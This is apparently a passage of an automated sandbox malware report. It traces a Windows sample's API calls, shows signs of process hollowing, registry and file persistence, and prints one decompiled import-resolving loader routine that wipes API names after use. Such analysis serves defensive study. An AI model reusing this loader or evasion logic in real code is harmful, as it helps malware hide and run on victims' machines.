    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5816, Relevance: 10.6, APIs: 7, Instructions: 109 Total matches: 43stringsleepmemory
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
